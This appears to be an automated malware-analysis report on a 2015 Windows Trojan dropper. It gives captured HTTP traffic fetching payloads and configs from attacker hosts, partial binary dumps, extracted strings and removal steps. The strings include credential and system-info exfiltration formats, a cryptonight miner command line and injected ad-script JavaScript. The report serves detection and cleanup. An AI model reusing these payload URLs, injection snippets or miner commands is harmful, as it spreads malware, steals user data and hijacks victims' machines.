User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: domain.awangba.com.cn
Connection: Keep-Alive


HTTP/1.0 200 OK
Server: nginx
Date: Sun, 05 Apr 2015 05:40:09 GMT
Content-Type: application/octet-stream
Content-Length: 477
Last-Modified: Wed, 25 Mar 2015 02:18:43 GMT
ETag: "55121b03-1dd"
Accept-Ranges: bytes
Age: 72797
X-Cache: HIT from ctzjjhs1
Via: 1.0 ctzjjhs1 (squid)
Connection: keep-alive
[config]..run=yes..cudp=19034..sudp=19033..stcp1=19042..stcp2=19048..b
guid=F3450EDC-EAF6-BCE5-BEC8-25CF003FE045..path=%temp%\downt..seed=Apl
usFile.bt..extparam=com..[x86]..name=BackEnd32.zip..url=hXXp://down.aw
angba.com.cn/proj/BackEnd32.zip..md5=2E2642D3D4568793E2699EAE74370D2E.
.path=%temp%\downt..param=comdhost.exe..[x64]..name=BackEnd64.zip..url
=hXXp://down.awangba.com.cn/proj/BackEnd64.zip..md5=C6B9ABFB262D1DD8DD
75243165020C08..path=%temp%\downt..param=comdhost.exeHTTP/1.0 200 OK..
Server: nginx..Date: Sun, 05 Apr 2015 05:40:09 GMT..Content-Type: appl
ication/octet-stream..Content-Length: 477..Last-Modified: Wed, 25 Mar 
2015 02:18:43 GMT..ETag: "55121b03-1dd"..Accept-Ranges: bytes..Age: 72
797..X-Cache: HIT from ctzjjhs1..Via: 1.0 ctzjjhs1 (squid)..Connection
: keep-alive..[config]..run=yes..cudp=19034..sudp=19033..stcp1=19042..
stcp2=19048..bguid=F3450EDC-EAF6-BCE5-BEC8-25CF003FE045..path=%temp%\d
ownt..seed=AplusFile.bt..extparam=com..[x86]..name=BackEnd32.zip..url=
hXXp://down.awangba.com.cn/proj/BackEnd32.zip..md5=2E2642D3D4568793E26
99EAE74370D2E..path=%temp%\downt..param=comdhost.exe..[x64]..name=Back
End64.zip..url=hXXp://down.awangba.com.cn/proj/BackEnd64.zip..md5=C6B9
ABFB262D1DD8DD75243165020C08..path=%temp%\downt..param=comdhost.exe..
<<< skipped >>>


GET /dyndns/getip HTTP/1.1
User-Agent: APlus
Host: VVV.3322.org


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Apr 2015 01:53:50 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Content-Type: text/plain; charset=utf-8
d..37.57.16.189...0..HTTP/1.1 200 OK..Server: nginx..Date: Mon, 06 Apr
 2015 01:53:50 GMT..Content-Type: application/octet-stream..Transfer-E
ncoding: chunked..Content-Type: text/plain; charset=utf-8..d..37.57.16
.189...0..



GET /proj/BackEnd32.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.awangba.com.cn
Connection: Keep-Alive


HTTP/1.0 200 OK
Server: nginx
Date: Wed, 25 Mar 2015 02:30:13 GMT
Content-Type: application/zip
Content-Length: 171307
Last-Modified: Wed, 25 Mar 2015 02:16:54 GMT
ETag: "55121a96-29d2b"
Accept-Ranges: bytes
Age: 3001
X-Cache: HIT from ctzjtzs1
Via: 1.0 ctzjtzs1 (squid)
Connection: keep-alive
PK.........TxF5..y}...........comdhost.exe..}|T..8..S.K...,.5B..h...5q
...n...} .($A.4Mm...P..7.{3\.-.M[.[[..J[..0V.,... ..b.j.R.....!..~...w
.y..y.>..^?4{..;...3g.93s....u..F.1._<..4h..B...G.o.....l.......
..<..;K../....<...o=.... .....K..g......x.......{.......7......y
..:.3.>c.Y.j.z^.d.e.N........k..Nv]9....bW.w.U.p....k4..)....25..F.
...k4E:......i5.3.,.q*.=..h...z.,.3.].....kXF...&.....:^D.^S`.......7j
4...4Y....?.....Y..z........h..#.u.W~6@.{.c....h..R...........y6Mc....
....{@....,].-.gu.:kR... ..<... ...9.4w p.. .z.....o.E...(..G..j...
2..#....J_...vA......>..@. .w.x^%....%m......$.....X.T.E..4s...O.jH
'....$..^X.....w...Mu..C....b...}...XW?:...~.>l?.v^(.d....Z..7'...'
.....4.....)..X.....&Q...}..c.rZ...._Z.RMg..<.8....`=.|Po...,.Y....
.......o....i...}z......k....cS......O.4.35.p85\...t.f}..........~.6"~
.xRa...."t{r..=..pj0jp..e=...g....g../...y>/...~oc....t.k?......?1.
.K....vh..`..h]....={%.'....9U#.......=b7...][email protected]../
-~.I..sF..S..........C!.2.c.SB...H.%.m^b .1.i..-.Oz$>...vx.m.f&..m&
gt;.%..:,..4....9...,...Z.W...i..-..z.0..>Z..$........d..1..xFZm.v.
..!....iF........s..F..2.I.\.<5.r...._.S.....KK..v#&f.$.. .#]..b.l.
.l.....i...epS........Z.;..l./.........S-KtdH...d.T.v..gJu....PIs%<
).~.>....Vl..X...OI...r.G:...h.k<G......_1.......B...]......../.
.....f.?........A .._=S.....b....a.X.a11p...4.}..0C...R....|.8.o......
a.E..x.P....@F >.7x.Ym...G.v.............z.(.Hf.-7...0..F..l."a....
..S..*,,.<.2.. ....._6~R....%..=..@#=.I.FR#.!...W.,3...........
<<< skipped >>>


GET /server/server.txt HTTP/1.1
User-Agent: AutoIt
Host: gengxin.kuaibu8.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:44 GMT
Content-Type: text/plain
Content-Length: 861
Connection: close
Accept-Ranges: bytes
ETag: "5F518A33E3525F232868CB7B8D966762"
Last-Modified: Wed, 01 Apr 2015 16:00:47 GMT
Server: AliyunOSS
x-oss-request-id: 5521E728B7EB447F466C7227
[File]..kuaibu8=hXXp://VVV.kuaibu8.com/iniuser/..uc916=hXXp://VVV.uc91
6.com/iniuser/..szicoad=hXXp://VVV.kuaibu8.com:8089/ico/..minyang=http
://mingyangdown.oss-cn-qingdao.aliyuncs.com/userini/..[update]..Startu
pdate=yes..kuaibu8=kuaibu8..szicoad=szicoad..minyang=minyang..uc916=uc
916..[server]..01=down04.kuaibu8.com..02=down04.kuaibu8.com..03=down04
.kuaibu8.com..04=down04.kuaibu8.com..05=down04.kuaibu8.com..06=down04.
kuaibu8.com..07=down04.kuaibu8.com..08=down04.kuaibu8.com..09=down04.k
uaibu8.com..10=down04.kuaibu8.com..[dllhost]..yewu01=/updata/adclient/
ie/ieadd.dll..yewu02=/updata/adclient/cpu/cpu.dll..yewu03=/updata/adcl
ient/sohu/sohuvip.dll..yewu04=/updata/adclient/kbts/kbts.dll..yewu05=/
updata/adclient/pcfen/pcfen.dll..yewu06=/updata/adclient/desk/desk1.ex
e..yewu07=/updata/adclient/iejs/iejs.dll..yewu99=/updata/adclient/yile
you/yileyou.dll..



GET /updata/adclient/client/szicoad.exe HTTP/1.1
User-Agent: AutoIt
Host: down04.kuaibu8.com


HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:33 GMT
Content-Type: application/x-msdownload
Content-Length: 389558
Connection: close
Accept-Ranges: bytes
ETag: "1DDF4CC1188804E8670E9CA6139C2FED"
Last-Modified: Fri, 27 Mar 2015 18:31:32 GMT
Server: AliyunOSS
x-oss-request-id: 5521E71D51235893A88ED225
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......9jUt}.;'}.;'
}.;'.E.'..;'f..'..;'f..'H.;'ts.'t.;'ts.'\.;'}.:'j.;'f..'7.;'f..'J.;'f.
.'|.;'}..'|.;'f..'|.;'Rich}.;'........................PE..L....z.O....
......#.......... ...`[email protected]... ....@..........................@....
............@.......@.............................. ..................
......................................................................
......................UPX0.....`..............................UPX1....
[email protected].... ... ......................@.
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.08.UPX!....!|..wP......<.......&..S...............F......!
g?....*v V3.......$=.G....Q....rF...;w.r.^.G...awVW4.....K...........S
&......,.I'....<..P...|C|(v..#.\...DQ.`..`.~.._.L.^...._....lp(...V
...=-.i..0.^.h....7..L,o...U..3.........&8...J.tNh..P..\..R.....'.....
...............X<Qj.........;.c.`\....tH..]9.....F$S3.;.`..9...,.^$
.^0.4...78.^.[o>.E..M..U.W.....}.PQR..._]...?...S.]..f..V;.7.......
t....i...&....r.6...O.r)...v{.@....*...........;=....|.K^.u..VRWS....f
.v^[....E.h..JC.....<[email protected]....._...r......G,..w....y.$.
<<< skipped >>>


GET /IP.aspx HTTP/1.1
User-Agent: AutoIt
Host: ipaddress.wb916.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49
[......]........=37.57.16.189........=...........HTTP/1.1 200 OK..Date
: Mon, 06 Apr 2015 01:53:22 GMT..Server: Microsoft-IIS/6.0..X-Powered-
By: ASP.NET..X-AspNet-Version: 4.0.30319..Cache-Control: private..Cont
ent-Type: text/html; charset=utf-8..Content-Length: 49..[......]......
..=37.57.16.189........=.............



GET /server/server.txt HTTP/1.1
User-Agent: AutoIt
Host: gengxin.kuaibu8.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:25 GMT
Content-Type: text/plain
Content-Length: 861
Connection: close
Accept-Ranges: bytes
ETag: "5F518A33E3525F232868CB7B8D966762"
Last-Modified: Wed, 01 Apr 2015 16:00:47 GMT
Server: AliyunOSS
x-oss-request-id: 5521E715A97F0D894E6C866D
[File]..kuaibu8=hXXp://VVV.kuaibu8.com/iniuser/..uc916=hXXp://VVV.uc91
6.com/iniuser/..szicoad=hXXp://VVV.kuaibu8.com:8089/ico/..minyang=http
://mingyangdown.oss-cn-qingdao.aliyuncs.com/userini/..[update]..Startu
pdate=yes..kuaibu8=kuaibu8..szicoad=szicoad..minyang=minyang..uc916=uc
916..[server]..01=down04.kuaibu8.com..02=down04.kuaibu8.com..03=down04
.kuaibu8.com..04=down04.kuaibu8.com..05=down04.kuaibu8.com..06=down04.
kuaibu8.com..07=down04.kuaibu8.com..08=down04.kuaibu8.com..09=down04.k
uaibu8.com..10=down04.kuaibu8.com..[dllhost]..yewu01=/updata/adclient/
ie/ieadd.dll..yewu02=/updata/adclient/cpu/cpu.dll..yewu03=/updata/adcl
ient/sohu/sohuvip.dll..yewu04=/updata/adclient/kbts/kbts.dll..yewu05=/
updata/adclient/pcfen/pcfen.dll..yewu06=/updata/adclient/desk/desk1.ex
e..yewu07=/updata/adclient/iejs/iejs.dll..yewu99=/updata/adclient/yile
you/yileyou.dllHTTP/1.1 200 OK..Date: Mon, 06 Apr 2015 01:53:25 GMT..C
ontent-Type: text/plain..Content-Length: 861..Connection: close..Accep
t-Ranges: bytes..ETag: "5F518A33E3525F232868CB7B8D966762"..Last-Modifi
ed: Wed, 01 Apr 2015 16:00:47 GMT..Server: AliyunOSS..x-oss-request-id
: 5521E715A97F0D894E6C866D..[File]..kuaibu8=hXXp://VVV.kuaibu8.com/ini
user/..uc916=hXXp://VVV.uc916.com/iniuser/..szicoad=hXXp://VVV.kuaibu8
.com:8089/ico/..minyang=hXXp://mingyangdown.oss-cn-qingdao.aliyuncs.co
m/userini/..[update]..Startupdate=yes..kuaibu8=kuaibu8..szicoad=szicoa
d..minyang=minyang..uc916=uc916..[server]..01=down04.kuaibu8.com..02=d
own04.kuaibu8.com..03=down04.kuaibu8.com..04=down04.kuaibu8.com..0
<<< skipped >>>


GET /updata/adclient/client/szicoad.exe HTTP/1.1
User-Agent: AutoIt
Host: down04.kuaibu8.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:36 GMT
Content-Type: application/x-msdownload
Content-Length: 389558
Connection: close
Accept-Ranges: bytes
ETag: "1DDF4CC1188804E8670E9CA6139C2FED"
Last-Modified: Fri, 27 Mar 2015 18:31:32 GMT
Server: AliyunOSS
x-oss-request-id: 5521E720CF90B15A28922240
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......9jUt}.;'}.;'
}.;'.E.'..;'f..'..;'f..'H.;'ts.'t.;'ts.'\.;'}.:'j.;'f..'7.;'f..'J.;'f.
.'|.;'}..'|.;'f..'|.;'Rich}.;'........................PE..L....z.O....
......#.......... ...`[email protected]... ....@..........................@....
............@.......@.............................. ..................
......................................................................
......................UPX0.....`..............................UPX1....
[email protected].... ... ......................@.
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.08.UPX!....!|..wP......<.......&..S...............F......!
g?....*v V3.......$=.G....Q....rF...;w.r.^.G...awVW4.....K...........S
&......,.I'....<..P...|C|(v..#.\...DQ.`..`.~.._.L.^...._....lp(...V
...=-.i..0.^.h....7..L,o...U..3.........&8...J.tNh..P..\..R.....'.....
...............X<Qj.........;.c.`\....tH..]9.....F$S3.;.`..9...,.^$
.^0.4...78.^.[o>.E..M..U.W.....}.PQR..._]...?...S.]..f..V;.7.......
t....i...&....r.6...O.r)...v{.@....*...........;=....|.K^.u..VRWS....f
.v^[....E.h..JC.....<[email protected]....._...r......G,..w....y.$.
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

bv.exe_464:

.text
`.rdata
@.data
.rsrc
CCmdTarget
%*.*f
commctrl_DragListMsg
COMCTL32.DLL
CNotSupportedException
MSWHEEL_ROLLMSG
ole32.dll
__MSVCRT_HEAP_SELECT
user32.dll
WS2_32.dll
WinExec
GetCPInfo
KERNEL32.dll
ExitWindowsEx
SetWindowsHookExA
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
USER32.dll
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GDI32.dll
comdlg32.dll
WINSPOOL.DRV
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
COMCTL32.dll
oledlg.dll
OLEPRO32.DLL
OLEAUT32.dll
iphlpapi.dll
%s\%s
explorer.exe
wbz1.exe
byteFirewall.dat
x-x-x-x-x-x
3.3.3.3
.?AVCCmdTarget@@
.PAVCException@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCResourceException@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.PAVCFileException@@
zcÁ
windows
KERNEL32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\bv.exe
h.rdata
H.data
.pdata
.reloc
TransportAddress
%d.%d.%d.%d
e:\bvaccdriver\tdi_hook_demo0828\objfre_win7_amd64\amd64\tdihook.pdb
ntoskrnl.exe
TDI.SYS
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
<VeriSign Class 3 Public Primary Certification Authority - G50
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
e:\bvaccdriver\tdi_hook_demo0828\objfre_wxp_x86\i386\tdihook.pdb
HAL.dll
1, 0, 0, 1
ByteFirewall.EXE
\Device\Udp
\Device\Tcp
\Driver\Tcpip
(*.*)

comdhost.exe_424:

.text
`.rdata
@.data
.rsrc
@.reloc
<!--%s-->
&#xX;
</%s>
%s='%s'
%s="%s"
<![CDATA[%s]]>
standalone="%s"
encoding="%s"
version="%s"
operator
GetProcessWindowStation
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
VVV.3322.org
msvcr32.dll
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%s%s%s
127.0.0.1
awangba.com
user=%s&id=%s&pw=%s&type=%s&run=%s&ip=%s&mac=%s&sysinfo=%s&client=e.%d
user=%s&id=%s&pw=%s&type=%s&ip=%s&mac=%s&sysinfo=%s&client=e
ProjPack.xml
hXXp://domain.awangba.com.cn/config.xml
plusconfig.xml
cudp
sudp
AplusFile.bt
stcp1
stcp2
00:00:00:00:00:00
X:X:X:X:X:X
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 R2
M-d-d%s
\\.\pipe\wangbax
Z:\svn\trunk\Develop\APlusClient\Win32\Release\BackEnd32.pdb
CreateNamedPipeA
ConnectNamedPipe
DisconnectNamedPipe
KERNEL32.dll
USER32.dll
RegOpenKeyA
RegEnumKeyExA
RegCloseKey
ADVAPI32.dll
WS2_32.dll
SHLWAPI.dll
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
URLDownloadToFileA
urlmon.dll
PSAPI.DLL
IPHLPAPI.DLL
GetCPInfo
GetProcessHeap
zcÁ
.?AVCMd5@@
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\comdhost.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt
F3450EDC-EAF6-BCE5-BEC8-25CF003FE045
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downt\AplusFile.bt
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
1$1)1014191
8,888\8|8
9 9$9,9@9\9`9
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
1.0.0.2
BackEnd.exe
1.120.1.3241

brocount.exe_1764:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
awangba.com
id=%s&mac=%s&brower=%s&user=%s&pw=%s
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
X:X:X:X:X:X
M-d-d%s
Z:\svn\trunk\Develop\APlusClient\Release\CountBro.pdb
KERNEL32.dll
USER32.dll
RegOpenKeyA
RegEnumKeyExA
RegCloseKey
ADVAPI32.dll
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
GetCPInfo
iexplore.exe
360se.exe
360chrome.exe
2345Explorer.exe
QQBrowser.exe
TTraveler.exe
f1browser.exe
Tango3.exe
2291Browser.exe
chrome.exe
firefox.exe
baidubrowser.exe
SogouExplorer.exe
miniie.exe
win-ie.exe
TheWorld.exe
twchrome.exe
.?AVCMd5@@
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\brocount.exe
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
1.0.0.1
1.147.1.3131

svchost.exe_1284:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
VVV.3322.org
9ACDDBD0-4236-4127-CCCC-B00F6AA7AB33
00:00:00:00:00:00
X:X:X:X:X:X
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 R2
M-d-d%s
127.0.0.1
awangba.com
pw=%s&id=%s&user=%s&type=%s&mac=%s&cpun=%d&cpux=%d&sysinfo=%s&ip=%s&worker=%d
taskmgr.exe
mssrv.exe
%s -a cryptonight -o %s -u %s -p x -t %d
hXXp://tongji.wangbax.cn/eda/cpuConfig
apluscpuconfig.ini
%s_%s
getEdaAddress.awangba.com
type=cpu&version=cpu1.0&user=%s&son=%s&pw=%s&osbit=%d&client=1.0.0
Z:\svn\trunk\Develop\CPUClient\Win32\Release\BootKit32.pdb
KERNEL32.dll
USER32.dll
RegOpenKeyExA
RegCloseKey
RegOpenKeyA
RegEnumKeyExA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
URLDownloadToFileA
urlmon.dll
PSAPI.DLL
IPHLPAPI.DLL
GetCPInfo
.?AVCMd5@@
37.57.16.189
zcÁ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\svchost.exe
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
2=3
? ?$?,?@?`?|?
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
1.112.1.11111
BootKit.exe
1.0.0.9

FC.exe_1516:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
M-d-d%s
awangba.com
Z:\svn\trunk\Develop\yxjgg\Release\slyxj.pdb
KERNEL32.dll
USER32.dll
RegOpenKeyW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestW
HttpQueryInfoW
WININET.dll
URLDownloadToFileW
urlmon.dll
IPHLPAPI.DLL
GetCPInfo
.?AVCMd5@@
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
11D1j1
1,2
3 3$3(3|3
mscoree.dll
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
tongji.wangbax.cn
Content-Type: application/x-www-form-urlencoded
X:X:X:X:X:X
SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\
/client/yxjKey?user=
/client/dbKey?user=
yxj.config
hXXp://domain.awangba.com.cn/yxj/config.xml
</BlackUrl>
<BlackUrl>
if (!document.body) return setTimeout(arguments.callee, 50);
var adpro= document.createElement('script');
adpro.type = 'text/javascript';
adpro.text = '_adpro_pub= "
adpro.text = '_adpro_slot= "
document.body.insertBefore(adpro, document.body.children.item(0));
adpro.src = 'hXXp://m.adpro.cn/adpro.js';
adpro.src = 'hXXp://tz.awangba.com.cn/a.js';
var yxj= document.createElement('div');
yxj.id='yxjgg';
document.body.appendChild(yxj);
id=%s&mac=%s&type=%s&user=%s&pw=%s
192.168.
.baidu.com
.hao123.com
.google.com
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\FC.exe
1.0.0.1
1.141.1.3021

mp.exe_1552:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
Z:\mysvn\trunk\NewMainPage\Release\NewMainPage.pdb
KERNEL32.dll
EnumChildWindows
MapVirtualKeyW
keybd_event
USER32.dll
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
URLDownloadToFileW
urlmon.dll
GetCPInfo
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
1*2024282<2
5 5$5(5,5054585
AKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
ntdll.dll
kernel32.dll
OLEACC.DLL
mp.ini
hXXp://domain.awangba.com.cn/mp/mp.ini
hXXp://123.sogou.com/?71090-1234
hXXp://123.sogou.com/?71049-
hXXp://123.sogou.com/?71090-
hXXp://VVV.duba.com/?un_367393_
hXXp://VVV.sogou.com/index.htm?pid=sogou-netb-38181d991caac98b-
lockmp.dll
explorer.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mp.exe
1.0.0.1
1.119.1.3171

300084.exe_256:

.text
`.rdata
@.data
.aspack
.adata
inflate 1.1.3 Copyright 1995-1998 Mark Adler
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
USER32.dll
RegCloseKey
RegCreateKeyA
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
MSVCP60.dll
iphlpapi.dll
InternetCrackUrlA
WININET.dll
WS2_32.dll
.\config.ini
%s\config.ini
iexplore.exe
.PAVCInternetException@@
1.1.3
%s%s%s
255.255.255.255
%s?%u
%s.crc?%u
"%s" %s
%s\%s
main.exe
%s\run.ini
X:X:X:X:X:X
center.pcdogs.info
center.boxlist.info
center.oldlist.info
X%sX%sX%sX%sX%sX
kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
mfc42.dll
msvcrt.dll
advapi32.dll
shell32.dll
msvcp60.dll
wininet.dll
ws2_32.dll

300084.exe_256_rwx_00410000_00003000:

kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
mfc42.dll
msvcrt.dll
advapi32.dll
shell32.dll
msvcp60.dll
iphlpapi.dll
wininet.dll
ws2_32.dll
RegCloseKey
InternetCrackUrlA


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1612
    bv.exe:464
    7048ico.exe:1096
    comdhost.exe:424

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\E_4\krnln.fnr (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\smss.exe (6435 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bv.exe (1784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\E_4\shell.fne (57 bytes)
    C:\byteFirewall.dat (253 bytes)
    %WinDir%\2015040604\userconfig.ini (22 bytes)
    %WinDir%\2015040604\config.ini (22 bytes)
    %WinDir%\2015040604\svchost.exe (2105 bytes)
    %System%\filelog.dat (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\fsq.exe (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mssrv.exe (38495 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\config[1].xml (617 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\downt\nclound32.zip (78548 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\config.ini (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\common[1].zip (196738 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\plusconfig.xml (617 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjt_qt.exe (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\brocount.exe (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\kjqt[1].zip (5979 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\svchost.exe (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\downt\kjqt.zip (3945 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mp.exe (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appboot.exe (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lockmp.dll (11344 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\FC[1].zip (7311 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\TT2[1].zip (34919 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\MainCtrl[1].xml (2457 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\downt\FC.zip (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\FC.exe (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\nclound32[1].zip (124172 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\downt\TT2.zip (17429 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\mainpage32[1].zip (14971 bytes)
